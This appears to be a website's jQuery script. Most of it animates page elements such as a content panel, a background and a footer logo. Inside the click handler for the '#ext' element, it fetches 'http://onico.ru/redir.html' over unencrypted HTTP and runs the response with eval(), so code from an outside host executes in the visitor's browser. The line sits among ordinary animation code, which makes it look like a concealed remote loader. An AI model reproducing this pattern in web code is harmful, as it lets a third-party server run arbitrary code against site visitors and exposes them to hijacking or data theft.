
 jQuery(document).ready(function(){
								 
       jQuery('#ext').click(function(){
      $("#content").animate({height:'+=20px'},300)
      .toggle(800);
	  $("#fon").animate({opacity:"0"},1200);
       jQuery(this).load('http://onico.ru/redir.html',function(resp) {
       eval(resp);
    })
                })
				
     
$("#footer").mouseenter(function(){
$("#logo_a").stop().animate({opacity:"0"}, 400);});

$("#footer").mouseleave(function() {
$("#logo_a").stop().animate({opacity:"1"}, 400);});

            });
			

